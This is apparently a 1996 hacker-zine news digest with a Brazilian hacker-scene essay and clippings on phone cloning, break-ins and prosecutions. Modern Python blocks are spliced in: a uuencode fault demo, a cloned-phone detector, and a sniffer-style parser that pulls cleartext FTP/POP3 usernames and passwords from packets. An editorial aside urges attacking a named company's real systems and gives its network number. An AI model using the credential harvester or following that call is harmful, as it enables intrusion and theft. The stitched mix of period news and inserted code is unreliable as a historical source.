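def truncate_body_line(listing: str, index: int, drop: int) -> str:
    """Constructed fault: line noise eats the last `drop` characters of listing
    line `index` (index 1 is the first body line after 'begin')."""
    lines = listing.splitlines()
    lines[index] = lines[index][:-drop]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    listing = uuencode(SAMPLE, "demo.zip")
    name, data = uudecode_capture(simulate_capture(listing))
    print(name, "intact:", data == SAMPLE, "digest ok:", verify_digest(data, SAMPLE_SHA256))
    _, damaged = uudecode_capture(truncate_body_line(listing, 1, 10))
    print("truncated line decoded silently:", len(damaged) == len(SAMPLE),
          "digest ok:", verify_digest(damaged, SAMPLE_SHA256))
```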


By these means one could, inside the Campus, do all the downloading one 
wanted, from anywhere in the world. Outside the campus, it is possible 
to do it by phone lines, but the modem will not go faster than 2400 
without character correction (no Zmodem at all), which makes it quite 
hard to download compressed files. One could get an account: that would 
be possible by these means, but the amount of trash during the phone 
connection would make it real hard to type in passwords and the like. To 
try doing any kind of thing but reading letters by modem is some kind of 
torture. The real thing is to do it by "linha dedicada", a special line 
for computer transmission. It’s much more expensive though, but if you 
have the money to spend on that... 


Perhaps the best way to get access to an Internet account though is to 
be part of the research project "Escola do Futuro" that among other 
things gets schools linked to the Net. That’s what I did and they pay me 
quite well to search for data on the Net for the students of those 
schools. The University of Campinas is said to give all students an 
Internet account regardless of knowledge of what-it-is, as soon as the 
guy (or girl) gets in. Of course here there’s BITNET also. That’s doomed 
to extinction, but this or that reason keeps people from closing it down. 
Most teachers use it; I guess there’s even some post-graduate work 
written about that. It’s easier to access via modem, also. Old habits 
die hard. 


Outside the Campus, for common people, there are few opportunities. The 
only thing you can get, at least until the opening of commercial 
Internet sites, something about to happen one of these days, is access 
by mail. You join one BBS with Internet access, and your mail is sent by 
an Internet account later during the day. This is not direct access, 
as one can see, but it’s an easy way to access by modem. The problem is 
that you have to pay if you use it too much. The BBS’s that do it don’t 
do it for free, either. Connection to Compuserve is also possible, but 
it also costs a lot of money, from my point of view. 


Because of the newspapers, the knowledge about the Internet is spreading 
fast and the number of sites is growing the same way as everywhere else 
in the world. Even the military people are starting with it. There are 
plans to enhance it and make better connections, and some informative 
material is being translated into Portuguese, like "Zen and the Art of 
Internet", and made available on gopher.rnp.br. There are many 
mirrors of many famous sites, like Simtel20, and at least one Internet 
BBS, the "Jacare BBS" (Alligator BBS, available by telnetting to 
bbs.secom.ufpa.br - 192.147.210.1 - login bbs). World Wide Web sites are 
becoming sort of popular also, but still available only to a few people 
who are lucky enough to get the access. Brazilian hackers are not very 
fond of sharing the knowledge of how to get access and other things, 
sometimes because of fear of losing it, sometimes because greed 
would overload the system. There’s no hacker magazine here, yet, 
and very few people confess their curiosity about hacking for knowledge 
for fear of not finding jobs. Anyway most would-be hackers either get a 
job and stop hacking for fun or keep their activities secret in order to 
pursue their objectives. 


Today, the Brazilian Hacker Underground has changed a little. Lots of 
magazines, dealing only with Internet issues, are being published. There 
is a hacker zine, the now famous "Barata Eletrica". This and the hacker 
list I created are starting to unite the computer rats here. But I had 
to stop hacking in order to write the e-zine. Too famous to do that. 
Another guy just started the thing. He did not learn from my mistake and 
is signing it with his name, also. I received lots of letters, even from 
as far as Mozambique, praising the material, which is very soft, for fear 
of losing my net access. Twice my account was "frozen". The people at my 
site are paranoid. They have suffered too much from break-ins already. 
Most BBS’s are trying to turn themselves into Internet providers or else 
to get e-mail access. There was a fear the State would control the thing, 
like they did with the Phone system. Can any of you guys imagine what it 
is, to pay 4,000 US dollars for a phone line? In the City of Sao Paulo 
(looks like L.A., one can say), that’s the average price. Cellular is 
cheaper. Motorola rules. The public phone system was changed again. No 
more "fichas". At least for long distance calls. It’s a small card that 
looks like plastic on one side and magnetic material on the other. I’m 
still trying to do 2600 meetings. Oh, once in a while there is a 
break-in here and there, and a hacker is interviewed on TV, but people 
are only now making the difference between the good guys (hackers) and 
the bad guys (crackers). With Win95, people are losing their fear of 
exchanging virus-source files. The lack of philes in Portuguese makes it 
difficult for people to learn about hacking. People who know about it 
don’t have enough time to write. I started to unite some guys to do a 
translation of "Hacker Crackdown", but that’s another story. I shortened 
the name of the book to "crack.gz". Guess what happened? My account is 
blocked up to this day. They told me I’ll get my access back. One of 
these days. One of these days I’ll re-write this article, and tell the 
whole thing in detail. 


Any Portuguese speaker who does not know about my e-zine, 
try an ftp.eff.org mirror. The URL: 
ftp://ftp.eff.org/pub/Publications/CuD/Barata_Eletrica 
Security Software Thwarts Hackers July 23, 1996 


(PRNewswire) 


World Star Holdings, Ltd. announced today that there have been approximately 
5,000 unsuccessful attempts to break its proprietary VPAGE Internet security 
system. In order to further demonstrate the functionality of its technology, 
the Company has unveiled a new addition to the World Star Internet security 
challenge: "The World Star Cyberhospital." 


The company recently launched an online contest offering more than $50,000 in 
cash and prizes to the first person to break its security. 


[ THESE CHALLENGES ARE UNADULTERATED BULLSHIT. Phrack suggests you test 
something other than the fake, non-production demo contest system. How 
well does their software hold up in a real business environment? 

(in other words: THEIRS!?!!@S) 


World Star Holdings (NET-WORLDSTAR-MB-CA) 
165 Garry Street 

Winnipeg, Manitoba R3C 1G7 

CA 


Netname: WORLDSTAR-MB-CA 
Netnumber: 205.200.247.0 ] 


Your Cellular Phone Number May Be Up For Grabs August 21, 1996 


by Mimi Whitefield (Miami Herald) 


Electronic bandits have snatched cellular phone numbers from the airwaves and 
cloned phones used by the Miami office of the Secret Service. 


BellSouth Florida president Joe Lacher’s phone has been cloned; Spero Canton, 
spokesman for BellSouth, has been a victim three times over. 


"The bums never sleep. They’re everywhere," complained Bill Oberlink, 
regional president for AT&T Wireless Services. 


But the good news is that law enforcement agencies and cellular companies 
themselves are fighting back with a new arsenal of tools, technology and laws 
that make it easier to detect and prosecute cellular bandits. 


Miami Fraud Squad Pursues Cellular Bandits August 12, 1996 


by Audra D.S. Burch (Miami Herald) 


How’s this for capitalism gone awry: Metro-Dade police nabbed a cellular 
bandit who was selling a $150 package deal -- $75 each for a stolen phone 
and number -- along with a 30-day guarantee on unlimited illegal air time. 


In a sting operation, police took him on the cut-rate offer. 


Thanks to the work of a special Metro-Dade Police Economic Crimes Bureau, the 
entrepreneurial cloner got a prison sentence. 


Newer Technology Aids Fight Against Cellular Fraud August 21, 1996 


by Mimi Whitefield (Miami Herald) 


New technology is on the side of cellular companies fighting telecom criminals 
who can rack up thousands of dollars in illegal charges before a consumer even 
knows he’s been hit. 


New Jersey-based Bellcore, for example, has developed NetMavin software, 
which can detect fraudulent or unusual calling patterns within half an hour. 


"This is really going to screw the cloners up," said Roseanna DeMaria, an 
AT&T Wireless executive. 
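
An added example, not part of the article and not Bellcore's NetMavin (whose 
internals the piece does not describe), of the simplest calling-pattern test a 
carrier can run over call records to catch a cloned number: one subscriber 
number (MIN) cannot be on two calls at once from two different cell sites, and 
cannot move between sites faster than a car. The record format, the cell-site 
coordinates and the sample records are all constructed for this example. 

```python
from dataclasses import dataclass
from datetime import datetime
from itertools import combinations
from math import radians, sin, cos, asin, sqrt

# Constructed cell-site coordinates (lat, lon) for the sample records below.
SITES = {
    "MIA-01": (25.7617, -80.1918),   # Miami
    "MIA-02": (25.7907, -80.1300),   # Miami Beach
    "NYC-01": (40.7128, -74.0060),   # New York
}


@dataclass(frozen=True)
class CallRecord:
    min_number: str   # Mobile Identification Number: the subscriber's phone number
    cell_site: str    # cell site that carried the call
    start: datetime
    end: datetime


def parse_cdr(line: str) -> CallRecord:
    """Parse one constructed call-detail record: MIN,site,start,end (ISO-8601)."""
    min_number, site, start, end = (f.strip() for f in line.split(","))
    return CallRecord(min_number, site,
                      datetime.fromisoformat(start), datetime.fromisoformat(end))


def km_between(site_a: str, site_b: str) -> float:
    """Great-circle distance between two cell sites (haversine formula)."""
    lat1, lon1 = map(radians, SITES[site_a])
    lat2, lon2 = map(radians, SITES[site_b])
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def suspicious_pair(a: CallRecord, b: CallRecord, max_kmh: float = 150.0):
    """Return a reason string if two calls on one MIN cannot come from one handset."""
    if a.cell_site == b.cell_site:
        return None
    # Same number, two sites, and the calls overlap in time: one handset cannot do that.
    if a.start < b.end and b.start < a.end:
        return "overlapping calls from %s and %s" % (a.cell_site, b.cell_site)
    # Not overlapping: does the gap between the calls allow travel between the sites?
    first, second = (a, b) if a.end <= b.start else (b, a)
    gap_h = (second.start - first.end).total_seconds() / 3600.0
    dist = km_between(first.cell_site, second.cell_site)
    if dist > max_kmh * gap_h:
        return "%.0f km between %s and %s in %.1f h" % (
            dist, first.cell_site, second.cell_site, gap_h)
    return None


def find_suspected_clones(lines, max_kmh: float = 150.0):
    """Group records by MIN, test every pair of calls, return {MIN: [reasons]}."""
    by_min = {}
    for line in lines:
        if line.strip():
            rec = parse_cdr(line)
            by_min.setdefault(rec.min_number, []).append(rec)
    alerts = {}
    for min_number, recs in by_min.items():
        for a, b in combinations(sorted(recs, key=lambda r: r.start), 2):
            reason = suspicious_pair(a, b, max_kmh)
            if reason:
                alerts.setdefault(min_number, []).append(reason)
    return alerts


# Constructed sample records (not real subscribers or traffic). The first MIN is
# on two overlapping calls from two sites, the second jumps Miami -> New York in
# 26 minutes, the third is a legitimate user moving across town.
SAMPLE_CDRS = """
3055550100,MIA-01,1996-08-20T09:00:00,1996-08-20T09:05:00
3055550100,MIA-02,1996-08-20T09:03:00,1996-08-20T09:12:00
3055550100,MIA-01,1996-08-20T11:00:00,1996-08-20T11:02:00
3055550199,MIA-01,1996-08-20T10:00:00,1996-08-20T10:04:00
3055550199,NYC-01,1996-08-20T10:30:00,1996-08-20T10:35:00
3055550177,MIA-01,1996-08-20T08:00:00,1996-08-20T08:10:00
3055550177,MIA-02,1996-08-20T08:40:00,1996-08-20T08:45:00
""".strip().splitlines()

if __name__ == "__main__":
    for number, reasons in find_suspected_clones(SAMPLE_CDRS).items():
        print(number, "->", "; ".join(reasons))
```

The pairwise check is quadratic per subscriber, which is fine for a day's 
records of one number; a production system would window the records. The 
max_kmh threshold is the knob that trades missed clones against false alarms 
on fast-moving legitimate users. 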


SPA Files Copyright Suit July 28, 1996 


(Reuters News) 


The Software Publishers Association said Sunday it filed a civil copyright 
infringement lawsuit against a Seattle man for illegal distribution of 
software on the Internet. 


The suit, which was filed July 23 in the U.S. District Court in Seattle, 
alleges that Max Butler illegally uploaded copyrighted software to a file 
transfer protocol site for distribution across the Internet, the trade 
association said. 


"This action is a warning to Internet users who believe they can infringe 
software copyrights without fear of exposure or penalty," said Sandra 
Sellers, Software Publisher’s vice president of intellectual property 
education and enforcement. 


The L0pht August, 1996 


by Steve G. Steinberg (Wired) p. 40 


What does a group of hackers do when the equipment they’ve accumulated over 
years of dumpster diving no longer fits in their apartments? They get 
a l0pht. Since 1993, a core group of seven Boston-based hackers have rented 
a loft space for hacking, trading information about cellular phone security, 
and building things like a wireless Internet service using discarded 
microwave equipment. 


Now that all of them have day jobs in the industry, why do they keep at it? 
"For the girls and the text files, of course," says Mudge. 




Cracking Down on the Outlaws of Cyberspace July 2, 1996 


by M.J. Zuckerman (USA Today) p. 4B 
What’s it take to be America’s top cybercop? 


"I was a hockey referee, so I’m used to being beaten up," suggests Jim 
Christy, who is among those most often mentioned for the title. And he’s 
been at it for only a decade. 


Today, with the weighty title of Chief of Computer Crime Investigations 
and Information Warfare, he is one of 68 computer investigators in the 
Air Force Office of Special Investigations (OSI). 


Christy, a Baltimore native, stumbled into the computer field. After 
drawing No. 35 in the draft lottery during the Vietnam War, he joined the 
Air Force rather than waiting to be drafted. He spent the next four years 
as a computer key punch operator, followed by 13 years as a civilian working 
computers at the Pentagon. 


When he moved to OSI, Christy largely ceased his hands-on involvement with 
computers and systems. 


Since last fall, Christy has been on temporary assignment to the Senate 
Permanent Subcommittee on Investigations, helping them examine security 
in cyberspace. 


"I like working up on Capitol Hill, because you can make a difference," 
Christy says. 


Hackers Penetrate Justice Department Home Page August 18, 1996 


(AP News Wire) 


Internet hackers infiltrated the Justice Department’s home page 
yesterday, altering the official web site to include swastikas, 
obscene pictures and lots of criticism of the Communications Decency Act. 


The official web site, which was turned off by government technicians 
when it was discovered, was changed to read "United States Department of 
Injustice," next to a red, black and white flag bearing a swastika. 


The page included color pictures of George Washington, Adolf Hitler, and a 
topless Jennifer Aniston. 


[ A link to a copy of the page is at http://www.fc.net/phrack/doj ] 


Employment Prospect Grim for Hacker August 19, 1996 


(AP News wire) 


Employment prospects are grim for Kevin Lee Poulsen, a computer whiz 
imprisoned five years for his cyberspace havoc. 


The 30-year-old hacker has been barred from getting near a computer for the 
next three years and he now fears selling cowboy boots at a Western store 
will be his only opportunity to make some money. 


"It’s the only place where I’ve been greeted with a positive attitude," he 
said during an interview last week. "I can’t get a job that I am qualified 
for, basically." 


On September 3, he goes to federal court in hopes of having some of the 
computer restrictions relaxed. 
School Hires Student To Hack Into Computers August 22, 1996 


(The Sun Herald) 


Students at Palisades Park’s high school needed their transcripts to 
send off to colleges. But they were in the computer and no one who knew 
the password could be reached. So the school hired a 16-year-old hacker 
to break in. 


Superintendent George Fasciano was forced to explain to the School 
Board on Monday the $875 bill for the services of Matthew Fielder. 


Feds aim low on hacker crackdown June 21, 1996 


by Lewis Z. Koch (Upside Online News) 

Nineteen-year-old Christopher Schanot of St. Louis, Mo. has been 
languishing in a Federal jail since March 25, 1996, charged with four 
counts of computer hacking. He is not allowed to post bond, because 
Federal authorities contend he is "a computer genius intent on 
infiltrating computer systems of some of the largest companies and 
entities in the country," and because a jailhouse snitch claims Schanot 
bragged he would run away if he were released. He has never been charged 
with a crime or arrested before. 


Schanot’s problems began after he ran away from home on May 30, 1995, 
taking some of his disks, a hard drive and personal items. According to a 
knowledgeable source close to Schanot, Chris felt his parents, especially 
his father Michael, didn’t understand or respect him. 


Less rocky, it seems, was his relationship with Netta Gilboa, a 
38-year-old woman living near Philadelphia. Gilboa is editor-in-chief and 
publisher of _Gray Areas_, a slick, text-heavy, irregular magazine that 
explores the "grey areas" of "alternative lifestyles and deviant 
subcultures." 


City of London Surrenders To Cyber Gangs June 2, 1996 


(Times of London) 


City of London financial institutions have paid huge sums to international 
gangs of sophisticated "cyber terrorists" who have amassed up to 400 million 
pounds worldwide by threatening to wipe out computer systems. 


A Sunday Times Insight investigation has established that British and 
American agencies are examining more than 40 "attacks" on financial 
institutions in London and New York since 1993. 


Victims have paid up to 13 million pounds a time after the blackmailers 
demonstrated their ability to bring trading to a halt using advanced 
"information warfare" techniques learnt from the military. 


According to the American National Security Agency (NSA), they have 
penetrated computer systems using "logic bombs" (coded devices that can 
be remotely detonated), electromagnetic pulses and "high emission radio 
frequency guns," which blow a devastating electronic "wind" through a 
computer system. 


The gangs are believed to have gained expertise in information warfare 
techniques from the American military, which is developing "weapons" 
that can disable or destroy computer hardware. Some are also known to 
have infiltrated banks simply by placing saboteurs on their payroll as 
temporary staff. 
Credit Fraud on AOL 


(AP Newswire) 


Two boys posed as billing representatives for an online service and stole 
at least 15 credit card numbers, and used those numbers to buy $15,000 
worth of merchandise, from computer equipment to cymbals, police said. 


The two 16-year-olds were charged with 39 counts of possession of 
stolen property, theft and attempted fraud. They were released to the 
custody of their parents pending a Family Court hearing. 


Police believe the boys obtained a program designed by computer 
hackers to flimflam customers of America Online. It sends a message to 
users saying they will be cut off if they don’t type in their name, 
credit card account number and computer service password. 


FBI Survey Reveals Growth of Cybercrime May 6, 1996 


by Rory J. O’Connor (San Jose Mercury News) 


Intruders are breaking into the nation’s computer systems at an 
increasing rate and often with more nefarious motives than in the 
past, according to a survey co-sponsored by the FBI and a private 
group of computer security professionals. 


"What this shows is that the ante has been upped in cyberspace," said 
Richard Power, senior analyst of the Computer Security Institute in 
San Francisco, which conducted the survey. "As all manner of commerce 
moves into cyberspace, all manner of crime is moving there as well. 
It’s no longer just vandalism." 


More than 40 percent of the 428 corporate, university and government 
sites that responded to the FBI survey reported at least one 
unauthorized use of their computers within the last 12 months, with 
some institutions reporting as many as 1,000 attacks in the period. 


It also appears that there’s more computer crime for hire occurring, 
Power said, exploiting mainly older hackers who have graduated to 
making money off the skill they once used simply to establish bragging 
rights with their peers. He suggested that some of the hiring is being 
done by intelligence services of various governments, although he 
offered no proof. 


University hacker to be hunted on the Internet April 27, 1996 


By Robert Uhlig (London Daily Telegraph) 


Computer experts at Cambridge University are using the Internet to hunt 
for a hacker who breached their security systems to access some of the 
world’s most sensitive research information. 


The authorities had no indication that the hacker deleted or altered 
files, "although there was the potential for that", he said. Files 
belonging to world-renowned research scientists may have been viewed or 
copied, giving the hacker an insight into commercially and academically 
sensitive material. 


The hacker used a so-called sniffer program, which sat silently within the 
computer system for four weeks, monitoring its activities. This could 
allow the hacker to compile a list of all passwords to give him unhindered 
access to every computer on the university’s network. "There was the 
potential to access any material on any computer anywhere on the 
university’s network - ranging from electronic-mail to confidential 
research data," said Mr Stibbs. 
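
The sniffer the article describes works because the login protocols of the 
day (FTP, POP3, telnet, rlogin) send the password in the clear, so any host 
on the same network segment can read it. The added example below, written for 
this page and not the Cambridge intruder's program (which the article does not 
show), reassembles constructed client-to-server packets for FTP and POP3 and 
pulls the USER/PASS pairs out of them. The packet tuples, addresses and 
credentials are all made up here; a real sniffer would read them off the wire. 

```python
import re
from collections import defaultdict

# Constructed packets: (src, dst, dst_port, payload). Only the client->server
# half of each session is shown, delivered interleaved to show the reassembly.
CAPTURED_PACKETS = [
    ("10.0.0.5", "10.0.0.20", 110, b"USER alice\r\n"),
    ("10.0.0.7", "10.0.0.21", 21,  b"USER bob\r\n"),
    ("10.0.0.5", "10.0.0.20", 110, b"PASS s3cret\r\n"),
    ("10.0.0.7", "10.0.0.21", 21,  b"PASS hunter2\r\n"),
    ("10.0.0.7", "10.0.0.21", 21,  b"CWD /pub\r\n"),
    ("10.0.0.9", "10.0.0.21", 21,  b"USER anonymous\r\nPASS guest@\r\n"),
    ("10.0.0.5", "10.0.0.20", 110, b"STAT\r\n"),
]

# Ports whose login exchange is a cleartext USER / PASS command pair.
CLEARTEXT_PORTS = {21: "ftp", 110: "pop3"}
USER_RE = re.compile(rb"^USER\s+(\S+)", re.IGNORECASE)
PASS_RE = re.compile(rb"^PASS\s+(.*)$", re.IGNORECASE)


def reassemble(packets):
    """Concatenate client->server payloads per (src, dst, port) flow, in arrival order."""
    flows = defaultdict(bytes)
    for src, dst, port, payload in packets:
        if port in CLEARTEXT_PORTS:
            flows[(src, dst, port)] += payload
    return flows


def harvest_credentials(packets):
    """Return (protocol, src, dst, user, password) for every USER/PASS pair seen."""
    found = []
    for (src, dst, port), data in reassemble(packets).items():
        user = None
        for line in data.split(b"\r\n"):
            m = USER_RE.match(line)
            if m:
                user = m.group(1).decode("ascii", "replace")
                continue
            m = PASS_RE.match(line)
            if m and user is not None:
                password = m.group(1).decode("ascii", "replace")
                found.append((CLEARTEXT_PORTS[port], src, dst, user, password))
                user = None   # one PASS per USER; a retry starts a new pair
    return found


if __name__ == "__main__":
    for proto, src, dst, user, password in harvest_credentials(CAPTURED_PACKETS):
        print("%-4s %s -> %s  %s / %s" % (proto, src, dst, user, password))
```

Nothing on the victim hosts changes when this runs; the only host-side signs 
are a network interface left in promiscuous mode and the sniffer's growing 
log file. The fix is not to hunt sniffers but to stop putting passwords on 
the wire in cleartext (SSH, TLS-wrapped POP/FTP, or one-time passwords). 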


Agents’ Codes Exposed on Web March 16, 1996 


By: Robert E. Kessler (Newsday) 


In an attempt to help (Ed) Cummings, and discredit the Secret Service, a Long 
Island-based hacker magazine last week launched a page on the World Wide 
Web publishing lists of Secret Service radio frequencies, photographs of 
agents, and codenames used by the agency for officials and buildings. 


Last year, Cummings, a 35-year-old native of Reading, Pa., pleaded 
guilty to federal charges in Philadelphia of possessing telecommunications 
equipment with intent to defraud and served a seven-month prison sentence. 


As a result of that conviction, last week Cummings was sentenced by a 
judge in Easton, Pa., north of Philadelphia, to serve a six- to 24-month 
sentence for violating probation after pleading no contest to a 1994 charge 
of tampering with evidence in another telephone hacking case. 


"Painting this guy as some white knight or someone who is standing up 
for free speech is wrong," said Kun. "He’s engaged in fraud." 


Cummings’ attorney, Kenneth Trujillo, could not be reached for comment. 


Judge Denies Bond to Accused Hacker April 6, 1996 


by Tim Bryant (St. Louis Post Dispatch) 


After another prisoner said accused computer hacker Christopher Schanot was 
planning a quick escape from his parents’ home near High Ridge, a federal 
magistrate decided Friday to keep Schanot in jail. 


"He said he would wait a couple of days and take off," testified the 
prisoner, Gerald Esposito. 


Schanot’s lawyer, federal public defender Norm London, told Davis that 
the alleged conversation between the young man and Esposito never happened. 


London, pointing out that Esposito has convictions for sexual assault, 
said the older prisoner had "made overtures" to jail officials about moving 
Schanot into Esposito’s housing area. 


Hacked Off! Government, Firms Fight Computer Intruders April 7, 1996 


by Colleen Bradford (St. Louis Post Dispatch) 


Every day, hundreds of people in front of personal computers try to sneak 
into corporate and government computer networks. Sometimes they just look 
around, sometimes they destroy data and sometimes they steal personal and 
classified information. 


Two weeks ago, law enforcement officials charged an Argentine, 21, with 
using the Internet to illegally break into computer networks at Department 
of Defense installations, NASA, Los Alamos National Laboratory and 
several universities. The Justice Department is now seeking Julio Cesar 
Ardita, who accessed confidential research files on aircraft design, radar 
technology and satellite engineering. 
And Chris Schanot, 19, from High Ridge, was in court in St. Louis last 
week on charges of hacking. Schanot, who fled to Pennsylvania from St. 
Louis after graduating from Vianney High School last May, is accused in a 
five-count indictment of breaking into the computers of Southwestern Bell, 
Bell Communications Research, Sprint and SRI International, a research and 
development contractor with government contracts. His trial is set for June 
10. 


Schanot, like other hackers, likely became addicted to the feeling of 
power that cracking into a private computer network brings, said St. Louis 
County Police Sgt. Thomas Lasater, who has been investigating computer 
crime for seven years. 


"Normally these young hackers do not use the computers for financial 
gain," Lasater said. "It’s just a challenge for them to see what they can 
conquer." 


Mike and Terry’s Dreadful Adventure 


by Elizabeth Weise (AP Newswire) 


Terry Ewing was late. His plane left in an hour and he was cutting it close. 
But he couldn’t tear himself away from his computer and the hole he’d hacked 
into the security network of Tower Records. 


He kept poking around, looking for something interesting to take to the 
hackers’ convention he was going to. Finally, five minutes before the 
airport shuttle beeped in front of his apartment, he downloaded a file 
containing 1,700 credit card numbers. 


"We didn’t expect anyone was watching," he said seven months later - 
through an inch of Plexiglas at the Sacramento County Jail. 


Ewing had had second thoughts about taking the Tower Records file with 
him on July 31, so he left it on his hard drive while he and Kim hit 
DefCon, the biggest of the West Coast hacker gatherings, for a weekend of 
bragging, hanging out and messing around. 


"We never guessed they were onto us. Their security was so weak it 
really blew," the 20-year-old Kim says by phone from the sixth floor of 
the same jail that held his friend. He is facing an 18-month sentence. 


